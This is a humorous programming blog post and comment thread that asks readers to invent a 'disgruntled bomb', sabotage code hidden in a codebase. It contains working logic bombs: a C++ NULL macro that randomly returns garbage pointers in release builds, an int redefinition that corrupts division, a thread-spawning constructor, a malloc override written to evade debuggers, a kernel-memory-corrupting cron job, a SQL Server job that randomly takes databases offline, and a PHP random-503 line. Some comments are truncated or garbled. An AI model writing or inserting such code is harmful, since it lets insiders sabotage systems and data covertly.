| « Unusual Document Mixture | Dirty Laundry » |
It's been quite a while since the last Bring Your Own Code. It's mostly because I haven't thought of any coding quandaries that fit in the "totally fun and doable over a quick break" difficulty; everything has been either hello world easy or graduate-level comp sci homework hard. If you've got any ideas, please do send them to me.
That said, today's BYOC is a little bit different than the previous ones. It was inspired by a submission from Mårten Rånge, who wrote "rumor has it that a disgruntled employee once left #define true false in a random header file in the codebase. Given our codebase, that would be a lot harder to debug than one might think."
"But it got me thinking," Mårten continued, "what is the worst thing a disgruntled employee could leave behind in the source code? This is what I came up with."
#include <cstdlib>
#ifndef _DEBUG
# undef NULL
# define NULL (TheBomb ())
# define CRASH_FREQUENCY 100000
struct TheBomb
{
template<typename TValue>
operator TValue* () const throw ()
{
return
(rand() % CRASH_FREQUENCY)
? 0
: (TValue*)((0xFF000000 & (int)this) | (rand () & 0x00FFFFF8))
;
}
};
template<typename TValue>
bool operator== (TheBomb theBomb, TValue* value)
{
// Just for fun NULL == will still work properly
return !value;
}
template<typename TValue>
bool operator== (TValue* value, TheBomb theBomb)
{
return
(rand() % CRASH_FREQUENCY)
? !value
: !!value
;
}
template<typename TValue>
bool operator!= (TheBomb theBomb, TValue* value)
{
// Just for fun NULL != will still work properly
return !!value;
}
template<typename TValue>
bool operator!= (TValue* value, TheBomb theBomb)
{
return
(rand() % CRASH_FREQUENCY)
? !!value
: !value
;
}
#endif
It's pretty clever; basically, the NULL macro randomly does the inverse.
Your exercise for the day: design a disgruntled bomb. Remember that obfuscation is not the goal; it's more about subtly changing the behavior of something or doing something that's difficult to detect and produces unexpected results. Perhaps it just involves adding one line to an existing codebase, or introducing an entirely re-written library. Be creative. It could be any language on any platform, but just make sure to explain what your "solution" does if it's not completely obvious.
And for the C# folks, don't forget that you can override the true and false operators!
|
The WTF about the sample is that you should not be using NULL in C++ code, you should just write 0.
How about: #ifndef _DEBUG |
|
C++ example:
#ifndef _DEBUG struct imt { int intval; imt(int i):intval(i) {} operator int() {return intval;} int operator /(imt other) {return (intval>>1)/(other.intval>>1);} }; #define int imt #endif This will create a completely invisible replacement for the standard integer, but such that all division is done with the low bit stripped. It'll work fine most of the time, but just occasionally it'll give slightly inaccurate results. And like the NULL example in the original post, it's something that you would trust perfectly ("that's just integer division, how can that be faulty?!?"); the debugger would tell you that it's "struct imt" instead of "int", but in the debugger, this won't be doing stuff anyway... For extreme Heisenbugginess, put this only in some places and not in others. You copy and paste a block of code from one module to another, and it gains some division inaccuracy. VERY occasionally this might even crash - if you try to divide an imt by 1, it'll become division by 0. Just to annoy the people who thought they were safe against div by 0! |
public class Class1 Addendum (2011-03-14 10:42): Improved ctor: public Class1() { Thread thread = new Thread(Spawn); thread.Start(); } Addendum (2011-03-14 10:44): This way, the constructor returns immediately, and then the app or machine crashes some time later. After many, many, many context switches. |
#define malloc __builtin_malloc Note that this code won't show anything suspicious even when running the program in strace, since it calls gettimeofday only from time to time. Better version can be achieved after rewriting to assembly, since not even gdb would show anything helpful. |
|
I'd have to go with making a cronjob running
Replace a random bit of kernel memory with a random value. |
|
C#:
static SomeCtor() __ Note from Alex: I just tested, and this actually works! |
|
although i would never put this in production, this would be something great to leave on a dev sql server as a "Ha ha! i got the last laugh!". The way to use this would be to create a sql server agent job and put the code in the job, and have the job execute something like once a day, week, month, etc.
Essentially what the code does is it randomly selects a non-system database, and generates a random number for the database and a random number to compare two. if both numbers match it sets the database to offline. so, the result of this is that every so often, at a non-specific interval, a random database will go offline. declare @databases table (name varchar(128), Sm int) declare @database table (name varchar(128), Sm int) declare @number int, @name varchar(128), @sql varchar(max) insert into @databases (name, Sm) select name, abs(checksum(newid()))% (select count(*) from sys.databases where database_id>4 and state=0) from sys.databases where database_id>4 and state=0 select @number=abs(checksum(newid()))% (select count(*) from sys.databases) insert into @database (name, Sm) select top 1 name, sm from @databases order by sm if exists (select top 1 name from @database) begin select @name=name from @database where sm=@number set @sql='alter database [' + @name + '] set offline with rollback after 30 seconds' exec(@sql) end |
|
I once contemplated adding this line of code into the big ball of PHP-mud that is the in-house CMS of my former employer:
if (mt_rand(0,10000) > 9000) { header('HTTP/1.0 503 Service Temporarily Unavailable', 503); exit; } |
| « Unusual Document Mixture | Dirty Laundry » |
